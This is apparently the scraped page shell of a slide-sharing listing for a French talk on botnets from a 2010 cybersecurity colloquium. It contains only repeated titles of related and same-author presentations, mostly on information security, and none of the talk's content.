 
Media center sous linux
Media center sous linuxMedia center sous linux
Media center sous linuxYannick Pavard
 
Le monitoring de la performance front
Le monitoring de la performance frontLe monitoring de la performance front
Le monitoring de la performance frontJean-Pierre Vincent
 
Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...
Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...
Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...Normandie Web Xperts
 

Similaire à Colloque cyber 2010 les botnets (20)

How with Suricata you save the world - NDH2K14
How with Suricata you save the world - NDH2K14How with Suricata you save the world - NDH2K14
How with Suricata you save the world - NDH2K14
 
Comment analyser une machine linux compromise
Comment analyser une machine linux compromiseComment analyser une machine linux compromise
Comment analyser une machine linux compromise
 
Hacking your Home @bdx.io
Hacking your Home @bdx.ioHacking your Home @bdx.io
Hacking your Home @bdx.io
 
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas GrégoireASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
ASFWS 2013 - Optimiser ses attaques Web avec Burp par Nicolas Grégoire
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
 
Petit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossir
 
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...Présentation Microsoft Advanced Threat Analytics  | Deep-Dive - MSCloud Summi...
Présentation Microsoft Advanced Threat Analytics | Deep-Dive - MSCloud Summi...
 
.NET Microframework: du code, de l&rsquo;électronique, de la robotique
.NET Microframework: du code, de l&rsquo;électronique, de la robotique.NET Microframework: du code, de l&rsquo;électronique, de la robotique
.NET Microframework: du code, de l&rsquo;électronique, de la robotique
 
Parinux 2009
Parinux 2009Parinux 2009
Parinux 2009
 
Réseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdfRéseaux-et-Sécurité.pdf
Réseaux-et-Sécurité.pdf
 
Programmation web asynchrone avec Tornado
Programmation web asynchrone avec TornadoProgrammation web asynchrone avec Tornado
Programmation web asynchrone avec Tornado
 
F5 ltm administering big ip v11
F5 ltm administering big ip v11F5 ltm administering big ip v11
F5 ltm administering big ip v11
 
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
 
_JCVFr
_JCVFr_JCVFr
_JCVFr
 
3 Microsoft Advanced Threat Analytics - Genève
3   Microsoft Advanced Threat Analytics - Genève3   Microsoft Advanced Threat Analytics - Genève
3 Microsoft Advanced Threat Analytics - Genève
 
sshGate
sshGatesshGate
sshGate
 
Media center sous linux
Media center sous linuxMedia center sous linux
Media center sous linux
 
Meetup Systemd vs sysvinit
Meetup Systemd vs sysvinitMeetup Systemd vs sysvinit
Meetup Systemd vs sysvinit
 
Le monitoring de la performance front
Le monitoring de la performance frontLe monitoring de la performance front
Le monitoring de la performance front
 
Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...
Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...
Conférence #nwx2014 - Maxime Mauchaussée - Partager du code maintenable et év...
 

Plus de michelcusin

Combler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationCombler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationmichelcusin
 
Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.michelcusin
 
Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12michelcusin
 
Article_pentest_Secus 10 12
Article_pentest_Secus 10 12Article_pentest_Secus 10 12
Article_pentest_Secus 10 12michelcusin
 
Social Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humainSocial Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humainmichelcusin
 
Intrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatiqueIntrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatiquemichelcusin
 
Vos enfants, Internet et vous
Vos enfants, Internet et vousVos enfants, Internet et vous
Vos enfants, Internet et vousmichelcusin
 
Pwn plug: Arme fatale
Pwn plug: Arme fatalePwn plug: Arme fatale
Pwn plug: Arme fatalemichelcusin
 
Article secus 05_11_pwnplug
Article secus 05_11_pwnplugArticle secus 05_11_pwnplug
Article secus 05_11_pwnplugmichelcusin
 
Le piratage à la portée de tout le monde
Le piratage à la portée de tout le mondeLe piratage à la portée de tout le monde
Le piratage à la portée de tout le mondemichelcusin
 
Maitriser l'art du kung fu cqsi2010
Maitriser l'art du kung fu cqsi2010Maitriser l'art du kung fu cqsi2010
Maitriser l'art du kung fu cqsi2010michelcusin
 
Article mc secus_10_10
Article mc secus_10_10Article mc secus_10_10
Article mc secus_10_10michelcusin
 
Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008michelcusin
 
Présentation botnet u_laval
Présentation botnet u_lavalPrésentation botnet u_laval
Présentation botnet u_lavalmichelcusin
 
Article secus 09_09
Article secus 09_09Article secus 09_09
Article secus 09_09michelcusin
 
Article mc secus_05_10
Article mc secus_05_10Article mc secus_05_10
Article mc secus_05_10michelcusin
 
Thank you for collaborating with your local hackers
Thank you for collaborating with your local hackersThank you for collaborating with your local hackers
Thank you for collaborating with your local hackersmichelcusin
 
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...michelcusin
 

Plus de michelcusin (18)

Combler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationCombler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'information
 
Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.
 
Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12
 
Article_pentest_Secus 10 12
Article_pentest_Secus 10 12Article_pentest_Secus 10 12
Article_pentest_Secus 10 12
 
Social Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humainSocial Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humain
 
Intrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatiqueIntrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatique
 
Vos enfants, Internet et vous
Vos enfants, Internet et vousVos enfants, Internet et vous
Vos enfants, Internet et vous
 
Pwn plug: Arme fatale
Pwn plug: Arme fatalePwn plug: Arme fatale
Pwn plug: Arme fatale
 
Article secus 05_11_pwnplug
Article secus 05_11_pwnplugArticle secus 05_11_pwnplug
Article secus 05_11_pwnplug
 
Le piratage à la portée de tout le monde
Le piratage à la portée de tout le mondeLe piratage à la portée de tout le monde
Le piratage à la portée de tout le monde
 
Maitriser l'art du kung fu cqsi2010
Maitriser l'art du kung fu cqsi2010Maitriser l'art du kung fu cqsi2010
Maitriser l'art du kung fu cqsi2010
 
Article mc secus_10_10
Article mc secus_10_10Article mc secus_10_10
Article mc secus_10_10
 
Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008
 
Présentation botnet u_laval
Présentation botnet u_lavalPrésentation botnet u_laval
Présentation botnet u_laval
 
Article secus 09_09
Article secus 09_09Article secus 09_09
Article secus 09_09
 
Article mc secus_05_10
Article mc secus_05_10Article mc secus_05_10
Article mc secus_05_10
 
Thank you for collaborating with your local hackers
Thank you for collaborating with your local hackersThank you for collaborating with your local hackers
Thank you for collaborating with your local hackers
 
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
 

Colloque cyber 2010 les botnets